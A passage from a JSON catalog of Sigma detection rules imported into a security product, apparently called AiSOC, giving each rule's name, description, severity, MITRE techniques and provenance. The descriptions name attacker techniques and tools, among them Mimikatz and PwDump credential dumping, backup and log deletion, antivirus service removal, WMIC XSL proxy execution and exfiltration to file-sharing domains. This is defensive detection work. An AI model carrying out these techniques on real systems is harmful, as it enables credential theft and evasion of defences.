"provenance": { "source": "SigmaHQ/sigma", "source_id": "055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml" } }, { "id": "sigmahq-sigma-056c7317-9a09-4bd4-9067-d051312752ea", "type": "detection", "name": "Powershell Executed From Headless ConHost Process", "description": "Detects the use of PowerShell commands from a headless ConHost window.\nThe \"--headless\" flag hides the console window from the user upon execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-executed-from-headless-conhost-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "056c7317-9a09-4bd4-9067-d051312752ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_headless_powershell.yml" } }, { "id": "sigmahq-sigma-058f4380-962d-40a5-afce-50207d36d7e2", "type": "detection", "name": "HackTool - CrackMapExec Execution Patterns", "description": "Detects various execution patterns of the CrackMapExec pentesting framework", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047", "T1053", "T1059.003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/hacktool-crackmapexec-execution-patterns.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "058f4380-962d-40a5-afce-50207d36d7e2", 
"source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml" } }, { "id": "sigmahq-sigma-05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "type": "detection", "name": "WMI Persistence - Command Line Event Consumer", "description": "Detects WMI command line event consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-persistence-command-line-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml" } }, { "id": "sigmahq-sigma-059c5af9-5131-4d8d-92b2-de4ad6146712", "type": "detection", "name": "LiveKD Driver Creation By Uncommon Process", "description": "Detects the creation of the LiveKD driver by a process image other than \"livekd.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/livekd-driver-creation-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "059c5af9-5131-4d8d-92b2-de4ad6146712", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml" } }, { "id": "sigmahq-sigma-05a2ab7e-ce11-4b63-86db-ab32e763e11d", "type": "detection", "name": "MMC Spawning Windows Shell", "description": "Detects a Windows command line executable started from MMC", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-spawning-windows-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml" } }, { "id": "sigmahq-sigma-05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "type": "detection", "name": "Service Registry Key Deleted Via Reg.EXE", "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. 
Often used by attackers to remove AV software services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-registry-key-deleted-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_delete_services.yml" } }, { "id": "sigmahq-sigma-05b3e303-faf0-4f4a-9b30-46cc13e69152", "type": "detection", "name": "Potential Persistence Via PowerShell User Profile Using Add-Content", "description": "Detects calls to the \"Add-Content\" cmdlet that modify the content of the PowerShell user profile, potentially adding suspicious commands for persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-powershell-user-profile-using-add-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml" } }, { "id": "sigmahq-sigma-05c36dd6-79d6-4a9a-97da-3db20298ab2d", "type": "detection", "name": "XSL Script Execution Via WMIC.EXE", "description": "Detects the execution of WMIC with the \"format\" flag to potentially load local XSL files.\nAdversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nExtensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1220", "T1059.005", "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xsl-script-execution-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml" } }, { "id": "sigmahq-sigma-05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "type": "detection", "name": "Add New Download Source To Winget", "description": "Detects usage of winget to add new additional download sources", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-new-download-source-to-winget.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" } }, { "id": "sigmahq-sigma-05f3c945-dcc8-4393-9f3d-af65077a8f86", "type": "detection", "name": "Suspicious SYSVOL Domain Group Policy Access", "description": "Detects access to domain Group Policies stored in SYSVOL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-sysvol-domain-group-policy-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" } }, { "id": "sigmahq-sigma-060c3ef1-fd0a-4091-bf46-e7d625f60b73", "type": "detection", "name": "Suspicious Get-ADReplAccount", "description": "Detects use of the Get-ADReplAccount cmdlet from the DSInternals PowerShell module.\nThe DSInternals PowerShell module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-adreplaccount.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" } }, { "id": "sigmahq-sigma-060d5ad4-3153-47bb-8382-43e5e29eda92", "type": "detection", "name": "Unsigned Module Loaded by ClickOnce Application", "description": "Detects unsigned module load by ClickOnce application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-module-loaded-by-clickonce-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "060d5ad4-3153-47bb-8382-43e5e29eda92", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml" } }, { "id": "sigmahq-sigma-06125661-3814-4e03-bfa2-1e4411c60ac3", "type": "detection", "name": "Backup Files Deleted", "description": "Detects deletion of files with extensions often used for backup files. 
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/backup-files-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06125661-3814-4e03-bfa2-1e4411c60ac3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_backup_file.yml" } }, { "id": "sigmahq-sigma-0649be4a-aeb0-45b0-b89e-7f1668f6d9c0", "type": "detection", "name": "IIS WebServer Log Deletion via CommandLine Utilities", "description": "Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.\nThreat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/iis-webserver-log-deletion-via-commandline-utilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "0649be4a-aeb0-45b0-b89e-7f1668f6d9c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_iis_logs_deletion.yml" } }, { "id": "sigmahq-sigma-065b00ca-5d5c-4557-ac95-64a6d0b64d86", "type": "detection", "name": "Remote Access Tool - Anydesk Execution From Suspicious Folder", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution-from-suspicious-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" } }, { "id": "sigmahq-sigma-065cceea-77ec-4030-9052-fc0affea7110", "type": "detection", "name": "DNS Query for 
Anonfiles.com Domain - Sysmon", "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-for-anonfiles-com-domain-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "065cceea-77ec-4030-9052-fc0affea7110", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/dns_query/dns_query_win_anonymfiles_com.yml" } }, { "id": "sigmahq-sigma-067d8238-7127-451c-a9ec-fa78045b618b", "type": "detection", "name": "Linux Doas Tool Execution", "description": "Detects the doas tool execution in linux host platform. 
This utility allows standard users to perform tasks as root, the same way sudo does.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/linux-doas-tool-execution.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "067d8238-7127-451c-a9ec-fa78045b618b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" } }, { "id": "sigmahq-sigma-0685b176-c816-4837-8e7b-1216f346636b", "type": "detection", "name": "HackTool - Quarks PwDump Execution", "description": "Detects usage of the Quarks PwDump tool via command-line arguments", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-quarks-pwdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0685b176-c816-4837-8e7b-1216f346636b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml" } }, { "id": "sigmahq-sigma-06b401f4-107c-4ff9-947f-9ec1e7649f1e", "type": "detection", "name": "Potential Arbitrary Command Execution Via FTP.EXE", "description": "Detects execution of \"ftp.exe\" script with the 
\"-s\" or \"/s\" flag and any child processes spawned by \"ftp.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059", "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-arbitrary-command-execution-via-ftp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ftp_arbitrary_command_execution.yml" } }, { "id": "sigmahq-sigma-06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "type": "detection", "name": "WMIC Loading Scripting Libraries", "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e. js, vbs, etc).\nIt could be an indicator of the SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmic-loading-scripting-libraries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" } }, { "id": "sigmahq-sigma-06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "type": "detection", "name": "Mimikatz Use", "description": "Detects Mimikatz keywords in different Windows event logs (some of them only appear in older Mimikatz versions, which are nevertheless still used by different threat groups)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.001", "T1003.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mimikatz-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/win_alert_mimikatz_keywords.yml" } }, { "id": "sigmahq-sigma-0718cd72-f316-4aa2-988f-838ea8533277", "type": "detection", "name": "Suspicious Start-Process PassThru", "description": "Detects PowerShell using the PassThru option of Start-Process to start a process in the background", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-start-process-passthru.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "0718cd72-f316-4aa2-988f-838ea8533277", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" } }, { "id": "sigmahq-sigma-071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "type": "detection", "name": "Possible Coin Miner CPU Priority Param", "description": "Detects a command line parameter very often used with coin miners", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/possible-coin-miner-cpu-priority-param.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_coinminer.yml" } }, { "id": "sigmahq-sigma-07330162-dba1-4746-8121-a9647d49d297", "type": "detection", "name": "AWS Config Disabling Channel/Recorder", "description": "Detects disabling of the AWS Config service (delivery channel or configuration recorder)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-config-disabling-channel-recorder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": 
{ "source": "SigmaHQ/sigma", "source_id": "07330162-dba1-4746-8121-a9647d49d297", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_config_disable_recording.yml" } }, { "id": "sigmahq-sigma-074e0ded-6ced-4ebd-8b4d-53f55908119d", "type": "detection", "name": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/awl-bypass-with-winrm-vbs-and-malicious-wsmpty-xsl-wsmtxt-xsl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml" } }, { "id": "sigmahq-sigma-076ebe48-cc05-4d8f-9d41-89245cd93a14", "type": "detection", "name": "Remote Access Tool - ScreenConnect Command Execution", "description": "Detects command execution via ScreenConnect RMM", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "076ebe48-cc05-4d8f-9d41-89245cd93a14", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml" } }, { "id": "sigmahq-sigma-07743f65-7ec9-404a-a519-913db7118a8d", "type": "detection", "name": "COM Hijack via Sdclt", "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1546", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/com-hijack-via-sdclt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07743f65-7ec9-404a-a519-913db7118a8d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml" } }, { "id": "sigmahq-sigma-07837ab9-60e1-481f-a74d-c31fb496a94c", "type": "detection", "name": "Network Communication Initiated To Portmap.IO Domain", "description": "Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1090.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-communication-initiated-to-portmap-io-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07837ab9-60e1-481f-a74d-c31fb496a94c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_portmap.yml" } }, { "id": "sigmahq-sigma-07a99744-56ac-40d2-97b7-2095967b0e03", "type": "detection", "name": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-privilege-escalation-attempt-via-exe-local-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "07a99744-56ac-40d2-97b7-2095967b0e03", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml" } }, { "id": 
